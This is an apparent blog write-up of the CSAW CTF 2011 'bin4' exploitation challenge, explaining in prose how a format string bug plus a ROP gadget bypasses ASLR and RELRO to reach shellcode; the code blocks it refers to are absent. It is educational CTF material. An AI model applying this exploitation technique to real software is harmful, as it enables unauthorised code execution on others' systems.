CSAW CTF 2011 Write-up: Exploitation bin4

This challenge shares the same source code as the bin2 challenge, but the environment is different:
we need to bypass ASLR and we can’t overwrite the GOT nor the .dtors section (because of RELRO).
We will bypass those protections using a ROP approach.

Here is the sourcecode:

As we can see there is a format string vulnerability caused by the snprintf function call which doesn’t specify a format.
Our purpose is to overwrite the opfunc pointer, as it is stored in the .bss section, which is not randomized.
We can find opfunc at 0x0804a010.

Thus we can call our binary with these arguments:

and our format string will be evaluated.

Now we know how and where to write in the memory, but what do we want to write?
As we want to rop, we first check what’s on the stack right before the opfunc call.

Our string is at $esp+8, this is because it was pushed on the stack right before the snprintf call (at 0x08048669), and $esp+8 has never been altered since.
But, after opfunc calls the operation we requested, $eip+4 will be pushed on the stack, so our string will be at $esp+12.

All we need now is a pop-pop-pop-ret gadget so the ret will jump to our string.
Luckily we don’t even have to search much:

So all we need to do is to put our shellcode after the operation symbol and write 0x080486e1 in opfunc.

This leads to the shellcode:

Leave a Reply

Your email address will not be published. Required fields are marked *